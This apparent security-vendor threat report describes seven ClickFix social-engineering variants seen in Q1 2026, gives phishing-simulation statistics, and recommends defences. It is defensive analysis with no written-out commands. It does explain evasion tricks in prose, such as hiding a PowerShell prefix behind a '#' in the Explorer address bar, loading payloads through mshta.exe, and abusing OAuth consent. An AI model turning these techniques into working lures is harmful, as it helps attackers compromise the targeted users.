Share this post
ClickFix is a social engineering technique that tricks users into running malicious commands themselves, typically by pasting a "fix" into the Windows Run dialog, terminal, or Explorer address bar. In Q1 2026, revel8 observed seven active variants targeting update prompts, file rendering errors, meeting joins, OAuth consent flows, AI tool onboarding, printer issues, and compliance workflows. Across nearly 30,000 simulated phishing emails, 10.7% of recipients opened the phishing site and 0.41% executed the payload command, with Microsoft-themed lures peaking at 23.6% interaction and 1.4% execution. Payload familiarity alone is no longer sufficient defense; scenario-specific training is required.
ClickFix-Update exploits the near-universal user familiarity with software update prompts. The lure presents a convincing browser or Windows update notification, complete with version numbers, progress bars, and branding, informing the user that an "assisted update" is required because automatic installation failed. The victim is walked through opening a terminal or Run dialog and pasting what appears to be a benign update command.
The command typically invokes mshta.exe or wscript.exe with a remote script URL - legitimate Windows binaries that are commonly allowlisted in application control policies. The update context is particularly effective because users have been trained to expect friction during updates and to follow prompts carefully.
A technically distinctive evasion observed in this variant: final payloads are encoded directly within the pixel data of PNG image files using steganography, then reconstructed in memory via a .NET loader - making file-scanning tools effectively blind to the payload.
Payloads observed: LummaC2, Rhadamanthys, SocGholish/NetSupport RAT, MintsLoader, Latrodectus.
FileFix weaponizes the common experience of receiving a document that won't render correctly. The lure arrives as an email attachment (often an HTML or MHTML file styled to look like a Word document or PDF) that displays a convincing "file repair" or "rendering error" prompt. The victim is instructed to paste a path into the Windows Explorer address bar to "reload the file from the secure server."
What the clipboard actually contains is a PowerShell command, with the legitimate-looking file path appended after a # comment character to keep it visible in the address bar while the malicious prefix executes silently. A critical additional risk: programs executed via the Explorer address bar carry no Mark of the Web (MOTW) attribute, which can bypass SmartScreen and other controls that evaluate file origin context
FileFix also offers attackers a bypass advantage over ClickFix: the Win+R Run dialog can be blocked by Group Policy, whereas the Explorer address bar is a routine interface element that cannot practically be restricted.
Payloads observed: Interlock RAT, StealC.
ClickFix-MeetingJoin targets the modern hybrid workplace's dependence on video conferencing by impersonating Teams, Zoom, or Webex join flows. The victim receives a calendar invite or email link that directs them to a landing page closely mimicking the legitimate meeting join experience. The page claims the meeting requires a codec or audio driver update that must be installed manually.
The urgency inherent in joining a meeting, especially if a manager or important client is waiting, suppresses critical thinking and accelerates compliance. The "fix" step instructs users to open a terminal and run what appears to be a software installation command. In practice, the command deploys a remote access tool or info-stealer.
Campaigns specifically targeted employees in customer-facing roles (sales, account management, support) who join external meetings frequently and are less likely to pause an unfamiliar join flow. Phishing emails delivering these links often spoofed known external partners or clients to add additional credibility.
Payloads observed: Stealc, Rhadamanthys, AMOS Stealer (macOS), QuasarRAT.
ConsentFix represents a significant evolution of the ClickFix model. Where other variants rely on convincing users to run commands, ConsentFix replaces the execution step entirely - directing victims through a standard OAuth 2.0 consent flow that grants the attacker's registered application persistent, token-based access to the target's cloud environment. No command is run. No file is downloaded. The user simply clicks Accept on what appears to be a legitimate app authorization screen.
The attack begins with a phishing lure: A fake IT notification, spoofed SaaS onboarding email, or malicious link in a collaboration tool, that directs the user to an attacker-crafted OAuth authorization URL requesting broad scopes (mail.read, files.readwrite, contacts.read). Once consent is granted, the attacker receives a refresh token providing long-lived access independent of the user's password or MFA status. The token persists through password resets and survives account lockouts.
ConsentFix specifically targeted executive assistants, finance personnel, and legal staff. Detection is exceptionally difficult because all resulting access appears as authorized, legitimate OAuth application activity in audit logs.
The newest strain in the ClickFix family, ClickFix-AI exploits the wave of AI tool adoption sweeping enterprise environments. As organizations rush to deploy AI assistants, copilots, and productivity tools, employees are increasingly accustomed to following onboarding flows, installing extensions, and running setup commands - often without IT oversight, since many AI tools are adopted informally by individual teams.
The lure typically arrives as a malicious search ad pointing to a page impersonating a popular AI tool's setup or "model update" interface. The page informs the user that a local component must be installed to enable AI features, and walks them through running a command in their terminal or the Windows Run dialog. The familiarity of the context (AI setup flows are new enough that users haven't formed strong pattern recognition around what's legitimate) makes this variant especially dangerous.
Notably, campaigns have been observed targeting organizations that had publicly announced AI initiatives, suggesting attackers monitor corporate communications and press releases to time lures with genuine internal rollouts.
Payloads observed: Credential harvesting tools designed to capture tokens from AI SaaS platforms alongside standard enterprise credentials.
This variant exploits the long history of Windows printing being genuinely painful for end users. The lure appeared primarily on compromised intranet-style pages and via QR codes on physical printouts left in office printer trays - a hybrid physical-digital attack vector. Detection improved quickly once the QR-code delivery mechanism was publicized.
Payloads observed: Lumma Stealer, BitRAT.
Particularly effective in regulated industries (finance, healthcare, legal) where compliance tasks are routine and employees are conditioned not to question them. Spoof pages mimic security awareness training platforms and internal LMS portals. The variant is notable for its patience: some campaigns run multi-day lure sequences (phishing email, reminder, urgency follow-up) before delivering the payload page.
Payloads observed: Credential stealers, AsyncRAT, Cobalt Strike.
Despite ClickFix being a well-documented and increasingly familiar attack technique, simulation data collected in Q1 2026 demonstrates that contextual social engineering continues to undermine user vigilance even when the payload mechanism itself is recognisable. Across six phishing simulations totalling nearly 30,000 emails sent, the unweighted average interaction rate, defined as recipients opening the simulated phishing website, reached 10.7%, with individual campaigns peaking significantly higher.
The Microsoft styled lure simulations, which paired a high-trust communication platform with a ClickFix payload, recorded a 23.6% interaction rate, more than double the campaign average, illustrating how plausible contextual hooks can suppress suspicion well before any payload is encountered. The incident rate - recipients who proceeded to execute the terminal command - averaged 0.41% across all campaigns, with the Microsoft simulations again producing the highest figure at 1.4%.
While this conversion rate from interaction to execution may appear modest, at organisational scale it represents significant exposure. Single campaign alone generated approximately 80 terminal execution events across the simulation cohort, from a single email wave. This confirms that ClickFix remains an effective threat in Q1 2026, and that payload familiarity alone is an insufficient defence without targeted, scenario-specific user training.
ClickFix is a social engineering attack that convinces users to execute malicious commands on their own machines, usually by copying a "fix" instruction from a fake error page and pasting it into the Windows Run dialog, a terminal, or the Explorer address bar. Because the user runs the command themselves, the technique bypasses many traditional email and endpoint controls.
ClickFix typically directs users to the Windows Run dialog (Win+R), which can be blocked by Group Policy. FileFix instead uses the Windows Explorer address bar, which cannot practically be restricted, and benefits from the fact that programs launched this way carry no Mark of the Web (MOTW) attribute - bypassing SmartScreen and origin-based controls.
Observed payloads in Q1 2026 include LummaC2, Rhadamanthys, SocGholish/NetSupport RAT, MintsLoader, Latrodectus, Interlock RAT, StealC, Stealc, AMOS Stealer (macOS), QuasarRAT, AsyncRAT, Cobalt Strike, BitRAT, and credential harvesters targeting AI SaaS platforms.
Customer-facing roles (sales, account management, support) are heavily targeted by ClickFix-MeetingJoin. Executive assistants, finance, and legal staff are the primary targets for ConsentFix. Regulated industries (finance, healthcare, legal) are especially exposed to ClickFix-Compliance. Organizations with publicly announced AI initiatives are increasingly targeted by ClickFix-AI.
ConsentFix doesn't require any command execution or file download. Victims grant a malicious OAuth application persistent token-based access to their cloud environment by clicking Accept on what looks like a legitimate authorization screen. The resulting access appears as authorized OAuth activity in audit logs and survives password resets and MFA changes.
Defense requires layered controls: disabling the Win+R Run dialog via Group Policy, restricting OAuth application consent to admin approval, monitoring for mshta.exe and wscript.exe execution from user contexts, and, most importantly, scenario-specific awareness training that goes beyond generic phishing simulations to cover the specific lure contexts (updates, meetings, AI onboarding, file rendering) attackers are using.
No. revel8's Q1 2026 simulation data shows that even when the ClickFix mechanism is well-documented and publicly known, contextual lures continue to drive interaction rates above 10% on average and above 23% for high-trust contexts like Microsoft Teams. Users need targeted, context-specific training, not just general awareness of the technique.
